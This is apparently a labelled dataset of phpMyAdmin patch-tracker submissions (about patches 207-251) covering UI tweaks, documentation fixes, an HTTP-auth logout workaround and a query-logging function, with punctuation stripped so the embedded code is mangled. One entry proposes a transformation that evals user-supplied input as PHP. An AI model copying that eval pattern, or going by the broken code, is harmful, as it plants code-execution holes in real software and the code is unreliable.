; \ if link identifier != FALSE) \{ if result mode != FALSE) \{ return mysql query PMA convert charset query), link identifier, result mode); \ return mysql query PMA convert charset additive.
query), link identifier, result mode); \} else \{ return mysql query PMA convert charset query), link identifier); \ return mysql query PMA convert charset additive.
query), link identifier); \} \} else \{ return mysql query PMA convert charset query)); \ return mysql query PMA convert charset additive.
query)); \} \} Original URL https sourceforge.net p phpmyadmin patches 207 https sourceforge.net p phpmyadmin patches 207 Original author anonymous","bug"
"24444","4152","Automatic left frame width.
RFE 954344 is about automatically adjusting the left frame width to fit the longest table name.
The suggested solution was to figure out the width by using known widths of certain letters and estimating.
The solution was rejected because the information would have had to have been available at frameset generation time, which means the frameset would need to reload itself every time a new table was loaded.
The width estimation method was also a little squirrelly.
In PMA 2.6.0 we now have code from Michael Keck which recalculates the frameset height for the upper left frame to make it fit regardless of the browser s font size.
I have adapted this code to provide automatic width adjustment for the left bottom frame.
cfg[ LeftWidth ], which is now theme specific, is now used as the minimum width, and if the table names would not fit into that width, then the width of the frame is increased.
It works in Safari 1.2.3 and Firefox 1.0PR and I expect it would work fine in IE Win, other Mozillas, and Opera, although I have not tested that.
It does not work well enough in IE Mac, so it is disabled for that browser.
Would you maybe consider this for 2.6.1?
It would need to be tested in other browsers first.
Original URL https sourceforge.net p phpmyadmin patches 208 https sourceforge.net p phpmyadmin patches 208 Original author ryandesign","bug"
"24444","4153","No field names in scratchboard.
This patch solves the problem I had, described in feature request 1115420 When trying to drag drop somewhere around 30 tables in the PDF scratchboard some long tables overlap partly or whole some other tables that cannot be dragged dropped because of it.
This solution provides a checkbox No field names , that, when checked and Go pressed), removes the field names from the tables, leaving only the table names itself to be dragged dropped.
A patch for phpMyAdmin 2.6.1, on file pdf pages.php is included.
Hope this will help other people as well...
Original URL https sourceforge.net p phpmyadmin patches 215 https sourceforge.net p phpmyadmin patches 215 Original author remcoa","bug"
"24444","4154","Improve order, label of bookmarks.
The bookmarks currently show up in the select menu in a more or less random order.
I would prefer if they would appear in alphabetical order.
This is provided by the patch file pma 2.6.0 bookmark order.patch .
The bookmark labels are prefixed in the menu by a number and a dash.
The number seems unimportant to me and I would suggest removing it and the dash.
This is provided by the patch file pma 2.6.0 no bookmark counter.patch .
I m not sure what then happens if you try to insert a second bookmark with the same name as an existing bookmark.
Perhaps the bookmark counter was there to ensure the uniqueness of the select menu item text.
Someone with a more intimate knowledge of the bookmark code should check whether the removal of this uniqueness causes a problem.
Might be even better to enforce a single bookmark with a given name, but that probably needs more thought and planning and I ll submit a feature request for that later.
Original URL https sourceforge.net p phpmyadmin patches 209 https sourceforge.net p phpmyadmin patches 209 Original author ryandesign","enhancement"
"24444","4155","PMA Transformation eval php code.. Hello I use frequently this simple but power full PMA Transformation.
text plain phpcode.inc.php The transformation eval options[0] as php code.
Include this transformation in distribution, is possibly not a bad idea.
The complete file is Attached.
Original URL https sourceforge.net p phpmyadmin patches 210 https sourceforge.net p phpmyadmin patches 210 Original author rebusnet","bug"
"24444","4156","empty string on PmaAbsoluteUri.
I wonder if the autodetect feature is working till now on main distribution of phpMyAdmin.
Last time I check it s still have the same bug on autodetect feature.
Here s some little fix that sould be solved the autodetect error [working on my compie now ] [ ==attached== ] And then you can set this params in config.inc.php cfg[ PmaAbsoluteUri ] = ; cfg[ PmaAbsoluteUri DisableWarning ] = TRUE; Hope this can improve one of the best MySQL clients in the world !!!
Udiarso Wulung Iswinoto wulung at indosql.net Original URL https sourceforge.net p phpmyadmin patches 211 https sourceforge.net p phpmyadmin patches 211 Original author wulung","bug"
"24444","4157","PMA backquote after ALTER TABLE.
In tbl relation.php upd query = ALTER TABLE .
table .
ADD FOREIGN KEY .
PMA backquote PMA sqlAddslashes master field)) . )
.
REFERENCES .
PMA backquote PMA sqlAddslashes foreign db) .
.
.
PMA sqlAddslashes foreign table)) .
.
PMA backquote PMA sqlAddslashes foreign field)) . )
; Why are all field db table variables slashed quoted except the variable table?
It should also be quoted or errors might arise, at least with Chinese table name.
There are 4 such occurences in this file.
Thanks for your excellent work.
Original URL https sourceforge.net p phpmyadmin patches 212 https sourceforge.net p phpmyadmin patches 212 Original author xfr","bug"
"24444","4158","crono refresh script.
hi!
i notice from some version ago that there is a session time, and if there is no comunitation to the server phpmyadmin doesn t allow user to get into, until the user login again.
So, i did made something similiar, but with a cronometer that is the word a think), showing the time left until it redirect the user to another page.
i put this little example on http www.iqqimi.cl crono index.html this is the code for the JS file sys cronoreset.js) JavaScript Document if document.captureEvents ) \{ non IE if Event.CLICK || KEYDOWN) \{ NS 4, NS 6, Mozilla 0.9.x document.captureEvents Event.CLICK || Event.KEYDOWN); \} \} document.onclick = cronoreset; document.onkeydown = cronoreset; function cronoreset )\{ parent.leftFrame.ResetCrono ); \} hope this could help....
Original URL https sourceforge.net p phpmyadmin patches 213 https sourceforge.net p phpmyadmin patches 213 Original author djvman","bug"
"24444","4159","LIKE ... as default.
i know you set LIKE as default operator instead of LIKE ... for performance reasons.
but does performance really matter that much?
mysql is aready really fast nowadays.)
i think for a wide spread success of phpmyadmin USABILITY is the most important thing.
and most of the time, you search something in textfields, you are too lazy to write the whole content of the field or write the every time.
to set LIKE ... as default you can change in line 799 in config.inc.php cfg[ TextOperators ] = array LIKE , LIKE ... , NOT LIKE , = , != , REGEXP , NOT REGEXP ); to cfg[ TextOperators ] = array LIKE ... , LIKE , NOT LIKE , = , != , REGEXP , NOT REGEXP ); Original URL https sourceforge.net p phpmyadmin patches 214 https sourceforge.net p phpmyadmin patches 214 Original author rubo77","bug"
"24444","4160","mysqli not clearly understandable error msg.
Hi, as it took me one hour to figure it out friday;)) there is an issue wit the strServerNotResponding variable.
mysqli.dbi.lib.php if error error == 2002) \{ error = .
string) error) .
.
GLOBALS[ strServerNotResponding ]; 2002 means explicit Can t connect to local MySQL server through socket and not The server is not responding =) Looking for a missconfigured php or mysql I finally had a look at mysqls errorcodes and taaadaa!
socket was in wrong place.
Quick n dirty sollution, but all lang files are affected.
.
add message.sh strServerNotResponding2002 Can not connect to local MySQL server through socket diff Nur phpMyAdmin 2.6.1o libraries dbi mysqli.dbi.lib.php phpMyAdmin 2.6.1 libraries dbi mysqli.dbi.lib.php phpMyAdmin 2.6.1o libraries dbi mysqli.dbi.lib.php 2005 01 11 12 53 51.000000000 0100 phpMyAdmin 2.6.1 libraries dbi mysqli.dbi.lib.php 2005 02 11 15 44 54.285196152 0100 203,7 203,7 if error error == 2002) \{ error = .
string) error) .
.
GLOBALS[ strServerNotResponding ]; \ error = .
string) error) .
.
GLOBALS[ strServerNotResponding2002 ]; \} elseif error defined PMA MYSQL INT VERSION ) PMA MYSQL INT VERSION gt;= 40100) \{ error = .
string) error) .
.
error message; \} elseif error) \{ Hope it helps people finding the reason for a not responding server.
C. Original URL https sourceforge.net p phpmyadmin patches 216 https sourceforge.net p phpmyadmin patches 216 Original author centr io","bug"
"24444","4161","Fix for bug 1126156.
Attached is a patch for the bug listed here https sourceforge.net tracker index.php?
func=detail aid=1126156 group id=23067 atid=377408 FAQ 6.12 export options) out of date My first attempt to attach a file, hopefully I get it right.
I re structured that FAQ, hope you find it acceptable, I ll gladly re work it if it s not.
I wasn t able to attach the patch directly to the bug report but maybe I m just an idiot ;) Original URL https sourceforge.net p phpmyadmin patches 217 https sourceforge.net p phpmyadmin patches 217 Original author ibennetch","bug"
"24444","4162","Fix for bug 1154137.
Fix for the wrong alt text being displayed for the logout button.
The bug is here https sourceforge.net tracker index.php?func=detail aid=1154137 group id=23067 atid=377408 Again, I m unable to attach this patch directly to the bug or I would have done so...
Original URL https sourceforge.net p phpmyadmin patches 218 https sourceforge.net p phpmyadmin patches 218 Original author ibennetch","bug"
"24444","4163","profiling.php references to variables removed?.
Why were the variable references removed in profiling.php from revision 2.5 to 2.6.
Has revision 2.6 worked for anybody since you did this?
I have included a marked up file along with a few other enhancements to make using the profiler a little better.
Glen Original URL https sourceforge.net p phpmyadmin patches 219 https sourceforge.net p phpmyadmin patches 219 Original author glenara","bug"
"24444","4164","[PATCH] Exports ommits to backquote USE clause.
When doing a data export the db doesn t get backquoted in the USE clause.
This causes problems reimporting dbs with hyphens in the name.
This is an easy fix.
Fix attached.
Original URL https sourceforge.net p phpmyadmin patches 220 https sourceforge.net p phpmyadmin patches 220 Original author leonardjo","bug"
"24444","4165","Docs modified PmaAbsoluteUri.
PmaAbsoluteUri autodetection seems to work quite well, many people make mistakes when attempting to fill it in, and the comments in config.inc.php suggest leaving it blank.
Documentation.html, however, wasn t very clear about that and states that filling this in is required.
This patch hopefully) improves and clears up that section of the docs and suggests leaving the variable blank.
Original URL https sourceforge.net p phpmyadmin patches 221 https sourceforge.net p phpmyadmin patches 221 Original author ibennetch","bug"
"24444","4166","auth type http with mod fastcgi.
To authenticate with auth type=http and phpMyAdmin running as FastCGI script, FastCGI has to provide the Authorization header.
This is done with the option pass header set to Authorization .
Set this option in apache2.conf e.g.
FastCgiConfig pass header Authorization).
In order to analyze this value install the attached patch.
Original URL https sourceforge.net p phpmyadmin patches 226 https sourceforge.net p phpmyadmin patches 226 Original author taspenatu","bug"
"24444","4167","improvement to FAQ 1.17a.
I ve attached a patch that hopefully) improves FAQ 1.17a to help with the OLD PASSWORD issue that we ve been seeing in the forums.
Original URL https sourceforge.net p phpmyadmin patches 222 https sourceforge.net p phpmyadmin patches 222 Original author ibennetch","enhancement"
"24444","4168","English translation Check overheaded et al).
From the English translation file strCheckOverhead = Check overheaded ; There is no word overheaded.
Shouldn t it be just overhead ?
It should be changed in all other translation files too.
CVS Snapshot 20050330 Original URL https sourceforge.net p phpmyadmin patches 223 https sourceforge.net p phpmyadmin patches 223 Original author ryandesign","bug"
"24444","4169","Quick Install and PmaAbsoluteURI.
The Quick Install portion of Documentation.html instructs the user to set PmaAbsoluteURI which I beleive is at least mostly depreciated in favor of the autodetect code.
This patch removes the one line from the quickstart section that refers to setting it...I think this is more clear, besides, the quickstart guide refers the user to the configuration section which in addition to the inline comments of config.inc.php) details the proper use of PmaAbsoluteUri.
Original URL https sourceforge.net p phpmyadmin patches 224 https sourceforge.net p phpmyadmin patches 224 Original author ibennetch","bug"
"24444","4170","Javascript setPointer change mouse pointer.
This patch is real basic, it adds an if else statement to change the mouse pointer to a hand pointer on mouseover and mousedown, and back to normal under any other circumstance.
The patch was made based off the anonymous CVS tree as of April 27, 2005, so it should apply with no problems.
Thank you all for a great product!
Original URL https sourceforge.net p phpmyadmin patches 225 https sourceforge.net p phpmyadmin patches 225 Original author eclipsboi","bug"
"24444","4171","fix for 1193719 helvetical spelling error.
fix for the mis spelling hevetica instead of the correct helvetica ) in the darkblue orange and original themes as caught by Castorius over here https sourceforge.net tracker index.php?func=detail aid=1193719 group id=23067 atid=377408 bug 1193719).
The problem is in the file theme print.css.php in both themes Original URL https sourceforge.net p phpmyadmin patches 227 https sourceforge.net p phpmyadmin patches 227 Original author ibennetch","bug"
"24444","4172","fix for 1207212 Can t change table format.
This is a patch to the bug report 1207212 it changes a variable name in tbl properties operations.php in line 41 and 328 first argument to PMA generateEnginesDropdown) Original URL https sourceforge.net p phpmyadmin patches 233 https sourceforge.net p phpmyadmin patches 233 Original author linusl","bug"
"24444","4173","add user without selecting an initial caracter first.
When visiting the privileges page with more than x users, one first has to select an initial character.
While this is good to minimize the page size, adding a new user doesn t require this.
Therefor it should be directly accessible.
This patch adds an else block with the Add user link.
Original URL https sourceforge.net p phpmyadmin patches 228 https sourceforge.net p phpmyadmin patches 228 Original author helmo","bug"
"24444","4174","Missing < table> at end of db details structure.
The end of db details structure.php is missing the closing lt; table gt; tag.
My HTML validator also says lt;form gt; tags should not be inside lt;table gt; tags, as is currently done on that page.
The attached patch provides the closing lt; table gt; tag and moves the lt;form gt; tag outside the lt;table gt; tag.
I m not sure if the latter makes the display look different... Perhaps extra space above or below the table?
Original URL https sourceforge.net p phpmyadmin patches 234 https sourceforge.net p phpmyadmin patches 234 Original author ryandesign","bug"
"24444","4175","Http Authentication.
As described by you in ... [3.1] When using HTTP authentication, an user who logged out can not relogin in with the same nick.
This is related to the authentication mechanism protocol) used by phpMyAdmin.
To bypass this problem just close all the opened browser windows and then go back to phpMyAdmin.
You should be able to log in again.
I may have a fix for this problem because i have faced the same issue when building a page.
The way i solved it was I have 3 files index.php, indexok.php, switch.php The sources for this are index.php lt;?php session start ); SESSION[ login ] = no ; HTTP 1.0 header Pragma no cache ); header Location switch.php ); ?
gt; indexok.php file actual main page) lt;?php session start ); if !isset SESSION[ login ]) or SESSION[ login ] == hack or !isset SESSION[ auth ])) \{ SESSION[ login ] = hack ; header Pragma no cache ); header Location switch.php ); \} else \{ Actual page \} ?
gt; switch.php Login file lt;?php session start ); auth = false ; Assume user is not authenticated if SESSION[ login ] == yes or SESSION[ login ] == hack ) \{ SESSION[ auth ] = set ; session cache expire 1); \} \} if auth == false or SESSION[ login ] == no ) \{ header WWW Authenticate Basic realm= Stock Administration ); SESSION[ login ] = yes ; header HTTP 1.0 401 Unauthorized ); header Pragma no cache ); echo Authorization Required.
; exit; \} else \{ header Pragma no cache ); header Location indexok.php ); \} ?
gt; I will now explain the principle because i may have missed some parts of the code.
When you access the page the Server processes the index.php page witch sets SESSION[ login ] to no and redirects the user to the switch.php page where the http login part takes place validation of username and password) if the username and password match thse in the database you are redirected to indexok.php if not a Bad username or password message apperars and the SESSION[ login ] is set to no.
For indexok.php considering this as any file that is protected by authentication) if any of the SESSION variables are set to no you are redirected to switch.php else the file is processed and the page is displayed.
As you know already the only way you can deauthenticate a HTTP login is to set new values to those variables and the only way tou can do that is to ask for username and password again.
In my solution to logout you just redirect the user to index.php witch sets the session variable to no again and redirects you to the switch.php page that again ask s for your username and password via HTTP AUTH.
I have tested it and works fine until now.
For any other information regarding instructions please send me an e mail at togetorr ro gl.ro I hope this helps you.
Original URL https sourceforge.net p phpmyadmin patches 229 https sourceforge.net p phpmyadmin patches 229 Original author togetorr","bug"
"24444","4176","Privileges link on database detail pages.
When working on a specific database I missed the option to directly check which users had privileges.
In this patch I added a extra tab in db details links.php.
A tab might not be the best place, but in my opinion it certainly belongs somewhere in the db details.
Original URL https sourceforge.net p phpmyadmin patches 230 https sourceforge.net p phpmyadmin patches 230 Original author helmo","bug"
"24444","4177","added version check to scripts upgrade.pl.
When reading the script I saw a TODO, so I did.
I also fixed a small bug, and updated the usage info and success message.
Original URL https sourceforge.net p phpmyadmin patches 231 https sourceforge.net p phpmyadmin patches 231 Original author helmo","bug"
"24444","4178","hide not superusers databases with no access.
hide not superusers databases with no access new config option listnoaccess ) new configuration option in config.inc.php cfg[ Servers ][ i][ listnoaccess ] = FALSE; list tables with no access add lines to left.php left.php.ori Fri Apr 1 00 28 04 2005 left.php Sat May 21 18 02 05 2005 460,6 460,14 and temporary tables, so the table type is irrelevant here.
tables = PMA DBI try query SHOW .
PMA MYSQL INT VERSION gt;= 50000 ?
FULL ) .
TABLES FROM .
PMA backquote db) .
; , NULL, PMA DBI QUERY STORE); \ \ don t show not superusers database entries if access denied defined \ access denied = PMA DBI try query SHOW TABLE STATUS FROM .
PMA backquote db)) === FALSE; \ access denied = access denied mysql errno ) === 1044); \ is superuser = PMA DBI try query SELECT COUNT ) FROM mysql.user , userlink, PMA DBI QUERY STORE); \ if access denied !
cfg[ Server ] [ listnoaccess ] !
is superuser) \{ continue; \}; \ \ num tables = tables) ?
PMA DBI num rows tables) 0; common url query = PMA generate common url db); if num tables) \{ Original URL https sourceforge.net p phpmyadmin patches 232 https sourceforge.net p phpmyadmin patches 232 Original author chmilo","bug"
"24444","4179","JS error in alter table more with mySQL<4.1.2.
version 2.6.2 pl1 tbl properties.inc.php defines JS function display field options if PMA MYSQL INT VERSION gt;= 40102 which is called regardless of the mySQL version.
and value is not officialy) an attribute of select elements; so this.options[this.selectedIndex].value should be preferred to this.value replace line 236 with this content cells[ i][ ci] = lt;select name= field type[] id= field .
i .
.
ci ci offset) .
.
PMA MYSQL INT VERSION gt;= 40102 ?
onchange= display field options this.options [this.selectedIndex].value, .
i . )
).
gt; .
\n ; Original URL https sourceforge.net p phpmyadmin patches 235 https sourceforge.net p phpmyadmin patches 235 Original author php sourcerer","bug"
"24444","4180","Better multi server comments in config.inc.php.
Yeah, it s silly, but I ve seen a number of users recently who couldn t figure out the multi user configuration section.
Attached is a slight addition to the code comments in config.inc.php to somewhat) clarify which section does what.
Original URL https sourceforge.net p phpmyadmin patches 236 https sourceforge.net p phpmyadmin patches 236 Original author ibennetch","bug"
"24444","4181","big file import instructions FAQ 1.16).
I m always looking for ways to improve the docs and FAQ 1.16 looked like it could use some help.
It deals with importing big files; the various PHP timeouts and resource limits.
I added two possible workarounds, suggesting first the UploadDir command and second a third party script that was suggested to me by another user.
Not sure how you all feel about putting that third party script in here; I m open to changing this based on your feelings.
Original URL https sourceforge.net p phpmyadmin patches 237 https sourceforge.net p phpmyadmin patches 237 Original author ibennetch","bug"
"24444","4182","Javascriptbutton to enter default values on creating new tbl.
i added this javascript.
it adds a button on top of the form to create a new table.
when you click on it it fills out the fields in the form with usefull default values first lilne name id type int 8) UNSIGNED AUTO INCREMENT and as primary key all other fields to varchar 255) i kimplemented it into tbl properties.inc.php,v 2.38 2005 07 23 12 14 39 from CVS it is added right after line 47 echo PMA generate common hidden inputs db, table); this is the script a javascript button to enter a default value for all fields by Ruben Barkow rubo77) ?
gt; lt;script type= text javascript language= javascript gt; lt;!
document.write lt;input type= button value= Enter default Values onclick= fill default values ) gt; lt;br gt; ); function fill default values ) \{ var tf=document.forms[0]; tf.elements[7].value= id ; tf.elements[8].options.selectedIndex=6; tf.elements[9].value= 8 ; tf.elements[10].options.selectedIndex=2; tf.elements[11].options.selectedIndex=0; tf.elements[12].value= ; extra has the habit that the order changes sonmetimes if tf.elements[13].options[0].text == ) tf.elements[13].options.selectedIndex=1; else tf.elements[13].options.selectedIndex=0; tf.elements[14].checked=true; nf=12; lt;?php if isset num fields)) \{ add value=255 vor varchar fields for i = 1 ; i lt; num fields; i ) \{ ?
gt; if document.forms[0].elements[8 nf lt;?php echo i; ?
gt;)].options[tf.elements[8 nf lt;?php echo i; ?
gt;)].options.selectedIndex].text== VARCHAR ) tf.elements[9 nf lt;?php echo i; ?
gt;)].value= 255 ; lt;?php \} \} ?
gt; return true; \} gt; lt; script gt; lt;?php end of button script Original URL https sourceforge.net p phpmyadmin patches 238 https sourceforge.net p phpmyadmin patches 238 Original author rubo77","bug"
"24444","4183","light select menu tree.
using optgroups).
this is a small patch that will allow the select based light menu provide a subtree grouping of databases using the optgroup tag in HTML 4. it adds two configuration options near the LeftFrameTableSeparator option) and a 20 line block of code in queryframe.php if statement) Original URL https sourceforge.net p phpmyadmin patches 239 https sourceforge.net p phpmyadmin patches 239 Original author urkle","bug"
"24444","4184","common.lib.php add class tblFooters.
adds class tblFooters to foot row in sql query table libraries common.lib.php 27 Jul 2005 00 26 52 0000 2.140 libraries common.lib.php 1 Aug 2005 10 59 47 0000 1920,7 1920,7 lt; tr gt; lt;?php if !empty edit target)) \{ echo lt;tr gt; lt;td bgcolor= .
cfg[ BgcolorOne ] .
align= center gt; ; \ echo lt;tr gt; lt;td class= tblFooters gt; ; echo edit link .
explain link .
php link .
refresh link .
validate link; echo lt; td gt; lt; tr gt; .
\n ; \} Original URL https sourceforge.net p phpmyadmin patches 244 https sourceforge.net p phpmyadmin patches 244 Original author cybot tm","bug"
"24444","4185","server privilegs removed unneeded br tag.
removed wordwrap ) the table witdth should be limited by Template!)
if someone thinks a textline is too long for prettiness Original URL https sourceforge.net p phpmyadmin patches 240 https sourceforge.net p phpmyadmin patches 240 Original author cybot tm","bug"
"24444","4186","move tablecomment to header and fix header.... move table comment into header and fix header to recognice iconic view with true, false and both Index header.inc.php =================================================================== RCS file cvsroot phpmyadmin phpMyAdmin header.inc.php,v retrieving revision 2.29 diff u r2.29 header.inc.php header.inc.php 10 Jul 2005 20 35 26 0000 2.29 header.inc.php 1 Aug 2005 13 06 37 0000 159,8 159,7 if PMA DISPLAY HEADING) \{ echo lt;table border= 0 cellpadding= 0 cellspacing= 0 id= serverinfo gt; .
\n .
lt;tr gt; .
\n ; \ echo lt;div id= serverinfo gt; .
\n ; header url qry = ?
.
PMA generate common url ); server info = !empty cfg[ Server ][ verbose ]) ?
cfg[ Server ][ verbose ] 169,44 168,62 .
cfg[ Server ][ port ] ) ); echo .
lt;td class= serverinfo gt; .
GLOBALS[ strServer ] .
amp;nbsp; .
lt;a href= .
GLOBALS[ cfg ][ DefaultTabServer ] .
?
.
PMA generate common url ) .
gt; ; \ echo ; if GLOBALS[ cfg ][ MainPageIconic ]) \{ echo lt;img src= .
GLOBALS[ pmaThemeImage ] .
s host.png width= 16 height= 16 border= 0 alt= .
htmlspecialchars server info) .
gt; ; \} echo htmlspecialchars server info) .
lt; a gt; .
\n .
lt; td gt; .
\n\n ; \ \ if GLOBALS[ cfg ][ MainPageIconic ] !== true ) \{ \ echo GLOBALS[ strServer ] .
amp;nbsp; ; \ \} \ \ echo lt;a href= .
GLOBALS[ cfg ][ DefaultTabServer ] .
?
.
PMA generate common url ) .
gt; ; \ echo htmlspecialchars server info) .
lt; a gt; .
\n ; if !empty GLOBALS[ db ])) \{ echo .
lt;td class= serverinfo gt; lt;div gt; lt; div gt; lt; td gt; .
\n .
.
lt;td class= serverinfo gt; .
GLOBALS[ strDatabase ] .
amp;nbsp; .
lt;a href= .
GLOBALS[ cfg ][ DefaultTabDatabase ] .
?
.
PMA generate common url GLOBALS[ db ]) .
gt; ; \ \ echo ; \ if GLOBALS[ cfg ][ MainPageIconic ]) \{ echo lt;img src= .
GLOBALS[ pmaThemeImage ] .
s db.png width= 16 height= 16 border= 0 alt= .
htmlspecialchars GLOBALS[ db ]) .
gt; ; \} echo htmlspecialchars GLOBALS[ db ]) .
lt; a gt; .
\n .
lt; td gt; .
\n\n ; \ \ if GLOBALS[ cfg ][ MainPageIconic ] !== true ) \{ \ echo GLOBALS[ strDatabase ] .
amp;nbsp; ; \ \} \ \ echo lt;a href= .
GLOBALS[ cfg ][ DefaultTabDatabase ] .
?
.
PMA generate common url GLOBALS[ db ]) .
gt; ; \ echo htmlspecialchars GLOBALS[ db ]) .
lt; a gt; .
\n ; if !empty GLOBALS[ table ])) \{ if PMA MYSQL INT VERSION gt;= 50000) \{ require once .
tbl properties table info.php ); \} else \{ tbl is view = FALSE; \} echo .
lt;td class= serverinfo gt; lt;div gt; lt; div gt; lt; td gt; .
\n .
.
lt;td class= serverinfo gt; .
isset GLOBALS[ tbl is view ]) GLOBALS[ tbl is view ] ?
GLOBALS[ strView ] GLOBALS[ strTable ]) .
amp;nbsp; .
lt;a href= .
GLOBALS[ cfg ][ DefaultTabTable ] .
?
.
PMA generate common url GLOBALS[ db ], GLOBALS[ table ]) .
gt; ; \ require once .
tbl properties table info.php ); \ \ echo ; if GLOBALS[ cfg ][ MainPageIconic ]) \{ echo lt;img src= .
GLOBALS[ pmaThemeImage ] .
isset GLOBALS[ tbl is view ]) GLOBALS[ tbl is view ] ?
b views s tbl ) .
.png width= 16 height= 16 border= 0 alt= .
htmlspecialchars GLOBALS[ table ]) .
gt; ; \} echo htmlspecialchars GLOBALS[ table ]) .
lt; a gt; .
\n .
lt; td gt; .
\n\n ; \ \ if GLOBALS[ cfg ][ MainPageIconic ] !== true ) \{ \ echo isset GLOBALS[ tbl is view ]) GLOBALS[ tbl is view ] ?
GLOBALS[ strView ] GLOBALS[ strTable ]) .
amp;nbsp; ; \ \} \ \ echo lt;a href= .
GLOBALS[ cfg ][ DefaultTabTable ] .
?
.
PMA generate common url GLOBALS[ db ], GLOBALS[ table ]) .
gt; ; \ \ echo htmlspecialchars GLOBALS[ table ]) .
lt; a gt; .
\n ; \ \ \ Displays table comment \ \ if !empty show comment) !isset avoid show comment)) \{ \ ?
gt; \ lt;!
Table comment gt; \ amp;quot; lt;i gt; lt;?php echo htmlspecialchars show comment); ?
gt; lt; i gt; amp;quot; \ lt;?php \ \} end if \} \} echo lt; tr gt; .
\n .
lt; table gt; ; \ echo lt; div gt; ; \ \} Sets a variable to remember headers have been sent Index tbl properties links.php =================================================================== RCS file cvsroot phpmyadmin phpMyAdmin tbl properties links.php,v retrieving revision 2.13 diff u r2.13 tbl properties links.php tbl properties links.php 27 Jun 2005 16 29 09 0000 2.13 tbl properties links.php 1 Aug 2005 13 09 48 0000 104,18 104,6 echo lt;br gt; ; \} Displays table comment if !empty show comment) !isset avoid show comment)) \{ ?
gt; lt;!
Table comment gt; lt;p gt; lt;i gt; lt;?php echo htmlspecialchars show comment) .
\n ; ?
gt; lt; i gt; lt; p gt; lt;?php \} end if echo \n\n ; 126,4 114,4 unset message); \} ?
gt; lt;br gt; ?
gt; lt;br gt; \ No newline at end of file Original URL https sourceforge.net p phpmyadmin patches 245 https sourceforge.net p phpmyadmin patches 245 Original author cybot tm","bug"
"24444","4187","corrected calculation of colspan.
corrected calculation of select all row there was missed the !
inside lt;td colspan= .
!empty dbstats) ?
10 3 ) .
gt; Original URL https sourceforge.net p phpmyadmin patches 241 https sourceforge.net p phpmyadmin patches 241 Original author cybot tm","bug"
"24444","4188","server databases.php display issues.
removed width= 20 from spacing cells for iconic view, now the text is always intended by the width of the icon create new database has now also an iconic view removed unnecessary double checks for if is superuser || cfg[ AllowUserDropDatabase ]) Original URL https sourceforge.net p phpmyadmin patches 242 https sourceforge.net p phpmyadmin patches 242 Original author cybot tm","bug"
"24444","4189","sql.php added class tblFooters to query table.
sql.php added class tblFooters to last row of sql query table Original URL https sourceforge.net p phpmyadmin patches 243 https sourceforge.net p phpmyadmin patches 243 Original author cybot tm","bug"
"24444","4190","queryframe.php.
unified spaces between icons cleaned html and php code display of querywindow icon now follows cfg[ QueryFrame ] always use no js=1 if cfg[ QueryFrameJS ] == true Original URL https sourceforge.net p phpmyadmin patches 246 https sourceforge.net p phpmyadmin patches 246 Original author cybot tm","bug"
"24444","4191","fix [ 1249931 ] ChangeLog, README, LICENSE should display n. fixes bug [ 1249931 ] ChangeLog, README, LICENSE should display not download Original URL https sourceforge.net p phpmyadmin patches 247 https sourceforge.net p phpmyadmin patches 247 Original author cybot tm","bug"
"24444","4192","unified appearance of query box and added...).
unified appearance of sql file query boxes and added class tblfooters in table gt; sql erquery and db gt; sql query Original URL https sourceforge.net p phpmyadmin patches 248 https sourceforge.net p phpmyadmin patches 248 Original author cybot tm","bug"
"24444","4193","server privilegs.php how about fieldsets?.
so phpMyAdmin uses XHTML und CSS2, it should also rely on its standards and use right semantics for the XHTML source, so give fieldsets a try!
comments are welcome!!!
removed width= 20 from spacing cells for iconic view, now the text is always intended by the width of the icon splitted source for iconic and non iconic view less if )) added fieldsets to non iconic view added class tblFooters where necessary Original URL https sourceforge.net p phpmyadmin patches 249 https sourceforge.net p phpmyadmin patches 249 Original author cybot tm","bug"
"24444","4194","free navtabs from tables.
this removes the tabvles from the navtabs in db details links.php server links inc.php tbl properties links.php querywindow.php and also moves the check for cfg[ lightTab ] into template css in db details links.php are this GLOBALS[ cfg ][ MainPageIconic ])?
replaced by a single if ) Original URL https sourceforge.net p phpmyadmin patches 250 https sourceforge.net p phpmyadmin patches 250 Original author cybot tm","bug"
"24444","4195","Logging of all queries run through phpMyAdmin.
We are using a developing DB and a production DB for our CMS.
Since there can be changes to the data on the production while we are working on new features it was constantly a hustle to deploy the changes made on the development system to the live version.
I wrote a small function that will log all queries run on phpMyAdmin, so we allways know exactly what changes where made.
I split up the log files to represent the different types of queries run and also made it configurable which types of queries will be logged most people won t use select and show, but just in case).
Also there is one logfile where all queries are stored and a seperate logfile for the different types so you can see changes to the table layout in one view) Hope you like it.
This could have saved us a lot of trouble if I thought about it earlier.
FILE .
config.inc.php For each server can be specified cfg[ Servers ][ i][ log query ] = FALSE; possible values in an array insert , update , delete , alter , select , show , explain , maint ) FILES .
libraries dbi mysql.dbi.lib.php line 100) .
libraries dbi mysql.dbi.lib.php line 104) if anybody knows a better place to put this, it d be great) in the function PMA DBI try query add PMA log query query); FILE maybe .
libraries common.lib.php add logging function Checks the query and writes to the according logfile function PMA log query sql query) \{ global cfg; if is array cfg[ Server ][ log query ])) \{ check for log directory if !is dir .
logs )) mkdir .
logs ); check for server specific directory name = cfg[ Server ][ verbose ]) ?
cfg[ Server ][ verbose ] GLOBALS[ server ]; if !is dir .
logs .
name)) mkdir .
logs .
name); check for DB specific directory if !is dir .
logs .
name .
.
GLOBALS[ db ])) mkdir .
logs .
name .
.
GLOBALS[ db ]); set the type of query || see sql.php line 305 type = select ; if preg match EXPLAIN[[ space ]] i , sql query)) type = explain ; else if preg match DELETE[[ space ]] i , sql query)) type = delete ; else if preg match INSERT|LOAD[[ space ]] DATA|REPLACE)[[ space ]] i , sql query)) type = insert ; else if preg match UPDATE[[ space ]] i , sql query)) type = update ; else if preg match SHOW[[ space ]] i , sql query)) type = show ; else if preg match CHECK|ANALYZE|REPAIR|OPTIMIZE)[[ space ]] TABLE[[ space ]] i , sql query)) type = maint ; else if preg match CREATE|ALTER)[[ space ]] i , sql query)) type = alter ; write the logfile if in array type, cfg[ Server ][ log query ])) \{ sql log = fopen .
logs .
name .
.
GLOBALS[ db ] .
.
type .
.log , a ); end = substr sql query, 1, 1) == ; ) ?
; ; fwrite sql log, sql query .
end .
\r\n ); fclose sql log); sql log = fopen .
logs .
name .
.
GLOBALS[ db ] .
complete.log , a ); end = substr sql query, 1, 1) == ; ) ?
; ; fwrite sql log, sql query .
end .
\r\n ); fclose sql log); \} \} \} Original URL https sourceforge.net p phpmyadmin patches 251 https sourceforge.net p phpmyadmin patches 251 Original author kajasheen","bug"
"24444","4196","A workaround for some mysqli problems.
